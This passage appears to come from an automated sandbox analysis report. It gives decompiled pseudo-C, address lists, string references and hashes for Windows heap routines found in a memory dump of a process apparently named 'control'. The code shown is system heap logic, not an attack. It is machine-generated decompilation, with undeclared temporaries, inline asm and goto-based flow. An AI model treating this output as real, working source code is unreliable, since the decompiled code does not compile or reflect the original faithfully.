0x045f3fae
0x045f3fb1
0x045f3fb1
0x045f3fb6
0x04648317
0x0464831a
0x00000000
0x045f3fbc
0x045f3fc1
0x045f3fc9
0x045f3fd7
0x045f3fda
0x045f3fdd
0x045f4021
0x045f4021
0x045f4029
0x045f4030
0x045f4044
0x045f4046
0x045f4046
0x045f4044
0x045f4049
0x04648327
0x04648334
0x04648339
0x0464833c
0x045f404f
0x045f404f
0x045f404f
0x045f4051
0x045f4056
0x045f4063
0x045f4063
0x045f4068
0x00000000
0x045f4068
0x045f3fdf
0x045f3fe2
0x045f3fe4
0x045f3fe7
0x045f3fef
0x045f4003
0x045f4005
0x045f4005
0x045f400c
0x045f4013
0x045f4016
0x045f4017
0x045f401b
0x045f401e
0x00000000
0x045f401e
0x045f3fb6
0x045f3eb1
0x045f3eb4
0x045f3eb7
0x045f3ebc
0x046482a9
0x046482ab
0x045f3ec2
0x045f3ed3
0x045f3ed5
0x045f3ed8
0x045f3ed8
0x045f3edd
0x046482b3
0x046482b6
0x00000000
0x045f3ee3
0x045f3ee8
0x045f3eed
0x045f3ef0
0x045f3ef3
0x045f3f02
0x045f3f05
0x045f3f08
0x046482c0
0x046482c3
0x046482c5
0x046482c8
0x046482d0
0x046482e4
0x046482e6
0x046482e6
0x046482ed
0x046482f4
0x046482f7
0x046482f8
0x046482fc
0x046482ff
0x046482ff
0x045f3f0e
0x045f3f11
0x045f3f16
0x045f3f1d
0x045f3f31
0x04648307
0x04648307
0x045f3f31
0x045f3f39
0x045f3f48
0x045f3f4d
0x045f3f50
0x045f3f50
0x045f3f53
0x045f3f58
0x045f3f65
0x045f3f65
0x045f3f6a
0x00000000
0x045f3f6a
0x045f3edd
0x045f3dda
0x045f3ddd
0x045f3de0
0x045f3de5
0x04648245
0x045f3deb
0x045f3df7
0x045f3dfc
0x045f3dfe
0x045f3e01
0x045f3e01
0x045f3e06
0x0464824d
0x0464824f
0x04648254
0x00000000
0x045f3e0c
0x045f3e11
0x045f3e16
0x045f3e19
0x045f3e29
0x045f3e2c
0x045f3e2f
0x0464825c
0x0464825f
0x04648261
0x04648264
0x0464826c
0x04648280
0x04648282
0x04648282
0x04648289
0x04648290
0x04648293
0x04648294
0x04648298
0x0464829b
0x0464829b
0x045f3e35
0x045f3e38
0x045f3e3d
0x045f3e44
0x045f3e58
0x046482a3
0x046482a3
0x045f3e58
0x045f3e60
0x045f3e6f
0x045f3e74
0x045f3e77
0x045f3e77
0x045f3e7a
0x045f3e7f
0x045f3e8c
0x045f3e8c
0x045f3e91
0x00000000
0x045f3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 045F3DC0
WindowsExcludedProcs, xrefs: 045F3D6F
Kernel-MUI-Language-SKU, xrefs: 045F3F70
Kernel-MUI-Number-Allowed, xrefs: 045F3D8C
Kernel-MUI-Language-Disallowed, xrefs: 045F3E97

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 9ddbba5cb057501d21f48ce19eb25e4cfb07d40672835953911969fd530dba47
Instruction ID: 00515cf61414e018cb7e4ef839e9b4547ee379fa1d2f423d71bb6019ac323139
Opcode Fuzzy Hash: 9ddbba5cb057501d21f48ce19eb25e4cfb07d40672835953911969fd530dba47
Instruction Fuzzy Hash: 00F15B76D00619EFDB15DF98C980AEFBBB9FF49650F14006AEA05A7250E734AE01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 045E40E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E045E40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E045EB150();
					} else {
						E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E045EB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E045EB150(", passed to %s", _t29);
					}
					_push("\n");
					E045EB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x46d6378 = 1;
						asm("int3");
						 *0x46d6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x045e40e6
0x045e40e8
0x045e40f1
0x0464042d
0x0464044c
0x04640451
0x0464042f
0x04640444
0x04640449
0x0464045d
0x04640466
0x0464046e
0x04640474
0x04640475
0x0464047a
0x0464048a
0x0464048c
0x04640493
0x04640494
0x04640494
0x00000000
0x0464049b
0x00000000

Strings

Invalid heap signature for heap at %p, xrefs: 04640458
, passed to %s, xrefs: 04640469
RtlAllocateHeap, xrefs: 04640468
HEAP: , xrefs: 0464044C
HEAP[%wZ]: , xrefs: 0464043F

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: f9ba0bc97031285bda3b62eb7305bc81db106f1d8a401f4e9048999098e8d7d0
Instruction ID: adf01d680ef4eff83352cef1c754d33021d138102613333f0135b0448539a3fa
Opcode Fuzzy Hash: f9ba0bc97031285bda3b62eb7305bc81db106f1d8a401f4e9048999098e8d7d0
Instruction Fuzzy Hash: 59014C36602352EFE31DDBA5E40DF6277A4FB81B35F19402DF10447742EAA5B940E511

Uniqueness

Uniqueness Score: -1.00%

Function 0460A830 Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0460A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x46d8748 - 1;
					if( *0x46d8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E045EB150();
									_t260 = _t257 + 4;
								} else {
									E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E045EB150();
								_t257 = _t260 + 4;
								__eflags =  *0x46d7bc8;
								if(__eflags == 0) {
									E046A2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E046AA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0463D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0460AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E046AA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E046AA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x46d8748 - 1;
					if( *0x46d8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E045EB150();
							} else {
								E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E045EB150();
							__eflags =  *0x46d7bc8;
							if(__eflags == 0) {
								_t131 = E046A2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x0460a83a
0x0460a83c
0x0460a83e
0x0460a841
0x0460a844
0x0460a84a
0x0460aa53
0x0460aa59
0x0460aa59
0x0460a858
0x0460a85e
0x0460aaf5
0x0460aafc
0x0465229e
0x046522a2
0x046522a8
0x046522b3
0x046522b5
0x046522bb
0x046522c1
0x046522c5
0x046522e6
0x046522eb
0x046522f0
0x046522c7
0x046522dc
0x046522e1
0x046522e1
0x046522f3
0x046522f8
0x046522fd
0x04652300
0x04652307
0x0465230e
0x0465230e
0x04652313
0x04652313
0x046522b5
0x046522a2
0x0460aafc
0x0460a864
0x0460a869
0x0460aa5c
0x0460aa5e
0x0460a86f
0x0460a87f
0x0460a885
0x0460a885
0x0460a88b
0x0460a890
0x0460a896
0x0460ab0c
0x0460ab0f
0x0460ab15
0x04652320
0x04652320
0x0460ab1b
0x0460a89c
0x0460a89f
0x0460a8a2
0x0460a8a2
0x0460a8a5
0x0460a8af
0x0460a8b3
0x0460a8b8
0x0460aa66
0x0460a8be
0x0460a8c5
0x0460a8c6
0x0460a8ce
0x04652328
0x04652332
0x04652337
0x04652337
0x0460a8ce
0x0460a8d4
0x0460a8d8
0x0460a8db
0x0460a8de
0x0460a8e1
0x0460a8e5
0x0460a8e8
0x0460a8f0
0x0460a8f3
0x0465234c
0x04652350
0x04652355
0x04652359
0x04652359
0x0460a8f9
0x0460a901
0x0460aae4
0x0460aae4
0x0460aaea
0x00000000
0x0460a907
0x0460a90a
0x0460a91d
0x0460a91d
0x00000000
0x0460a910
0x0460a910
0x0460a910
0x0460a914
0x0460a924
0x0460a924
0x0460a924
0x0460a924
0x0460a916
0x0460a91b
0x00000000
0x00000000
0x00000000
0x0460a91b
0x0460a925
0x0460a925
0x0460a932
0x0460a936
0x0460a93c
0x0460a93c
0x0460a93c
0x0460ab22
0x0460ab24
0x0460ab27
0x0460ab27
0x0460a942
0x0460a944
0x0460aaba
0x0460aabd
0x0460aac0
0x0460aac0
0x0460aac2
0x0460ab2f
0x0460aac4
0x0460aac4
0x0460aac7
0x0460aaca
0x0460aacc
0x0460aace
0x0460aace
0x0460aace
0x0460aad1
0x0460aad1
0x0460aad7
0x0460aad9
0x00000000
0x00000000
0x04652361
0x04652369
0x0465236b
0x00000000
0x04652371
0x00000000
0x04652371
0x00000000
0x0465236b
0x0460aac0
0x0460a94a
0x0460a94a
0x0460a94d
0x0460a94d
0x0460a950
0x0460a954
0x04652376
0x04652380
0x0460a95a
0x0460a95a
0x0460a95c
0x0460a95f
0x0460a961
0x0460a961
0x0460a967
0x0460a96a
0x0460a972
0x0460aa02
0x0460aa06
0x0460aa10
0x0460aa16
0x0460aa16
0x0460aa1b
0x0460aa21
0x0460aa24
0x0460aa27
0x0460aa29
0x0460aa2c
0x0460aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x0460a978
0x0460a978
0x0460a97b
0x0460a981
0x0460a996
0x0460a998
0x0460a99f
0x0460a9a2
0x0465238a
0x0460a9a8
0x0460a9a8
0x0460a9a8
0x0460a9aa
0x0460a9ad
0x0460a9b0
0x0460a9bb
0x0460a9be
0x0460a9c7
0x0460a9c9
0x0460a9c9
0x0460a9cc
0x0460a9d1
0x0460aa6d
0x0460aa70
0x0460aa73
0x0460aa75
0x0460aa79
0x0460aa7e
0x0460aa82
0x0460aa8f
0x0460aa94
0x0460aa96
0x04652392
0x046523a1
0x046523a1
0x0460aa9c
0x0460aa9f
0x0460aaa2
0x0460aaa2
0x0460aaa8
0x0460aaab
0x0460aaaf
0x00000000
0x0460aab5
0x00000000
0x0460aab5
0x0460a9d7
0x0460a9d7
0x0460a9da
0x0460a9e0
0x0460a9e3
0x0460a9e6
0x0460a9e9
0x0460a9eb
0x0460a9fd
0x0460a9fd
0x00000000
0x0460a9eb
0x00000000
0x00000000
0x00000000
0x0460a983
0x0460a983
0x0460a983
0x0460a987
0x0460a995
0x0460a995
0x0460a995
0x0460a995
0x0460a989
0x0460a98e
0x00000000
0x0460a990
0x00000000
0x0460a990
0x0460a98e
0x00000000
0x0460a983
0x0460a972
0x0460a90a
0x0460aa34
0x0460aa34
0x0460aa40
0x0460aa43
0x0460aa46
0x0460aa4d
0x046523ab
0x046523b2
0x046523b8
0x046523be
0x046523c3
0x046523c5
0x046523cb
0x046523d1
0x046523d5
0x046523f6
0x046523fb
0x046523d7
0x046523ec
0x046523f1
0x04652403
0x04652408
0x04652410
0x04652417
0x04652422
0x04652422
0x04652417
0x046523c5
0x046523b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 04652403
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 046522F3
HEAP: , xrefs: 046522E6, 046523F6
HEAP[%wZ]: , xrefs: 046522D7, 046523E7

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 608d979f65b4aba64f6b4d876cd86888c6082276b3a13c422e5ccbdea68cb1de
Instruction ID: 4d0d7360c3c49dd52f36566497cfd68d689044d4fafed8338ef5c9e921fc7883
Opcode Fuzzy Hash: 608d979f65b4aba64f6b4d876cd86888c6082276b3a13c422e5ccbdea68cb1de
Instruction Fuzzy Hash: 0BD19A34A007469FDB28CFA8C490ABAB7B1FF68340F15C569D89A9B385F334B941DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0460A229 Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0460A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E0460DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E04629730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E046AA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E04629660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E045EB150();
					} else {
						E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E045EB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E04607D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E046A138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E04607D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E04607D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E046A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E04607D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E04607D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E046A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0463D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x0460a229
0x0460a231
0x0460a23f
0x0460a242
0x0460a244
0x0460a24c
0x0460a255
0x0460a25a
0x0460a25f
0x04651c76
0x04651c78
0x04651c7e
0x04651c7f
0x04651c81
0x04651c82
0x04651c84
0x04651c89
0x04651c8b
0x04651c9e
0x04651c9e
0x04651cab
0x04651cb2
0x00000000
0x04651cb2
0x04651c8d
0x04651c92
0x00000000
0x00000000
0x04651c94
0x04651c98
0x00000000
0x00000000
0x00000000
0x04651c98
0x0460a265
0x0460a265
0x0460a266
0x0460a26f
0x0460a270
0x0460a276
0x0460a277
0x0460a279
0x0460a27e
0x0460a282
0x04651db5
0x04651dbb
0x04651dc1
0x04651dc5
0x04651de4
0x04651de9
0x04651dc7
0x04651ddc
0x04651de1
0x04651def
0x04651df3
0x04651df7
0x04651dfe
0x04651e06
0x0460a302
0x0460a308
0x0460a308
0x0460a288
0x0460a28d
0x0460a294
0x04651cc1
0x0460a29a
0x0460a29a
0x0460a29a
0x0460a29f
0x04651ccb
0x04651cd1
0x04651cd8
0x04651cea
0x04651cea
0x04651cd8
0x0460a2a9
0x0460a2af
0x0460a2bc
0x04651cfd
0x0460a2c2
0x0460a2c2
0x0460a2c2
0x0460a2c7
0x04651d07
0x04651d0d
0x04651d14
0x04651d1f
0x04651d21
0x04651d2c
0x04651d2c
0x04651d2c
0x04651d47
0x04651d47
0x04651d14
0x0460a2cd
0x0460a2d2
0x0460a2d9
0x04651d5a
0x0460a2df
0x0460a2df
0x0460a2df
0x0460a2e4
0x04651d69
0x04651d6b
0x04651d76
0x04651d76
0x04651d76
0x04651d91
0x04651d91
0x0460a2ea
0x0460a2f0
0x0460a2f5
0x04651da8
0x04651dad
0x04651dad
0x0460a2fd
0x0460a300
0x00000000

Strings

`, xrefs: 04651C8D
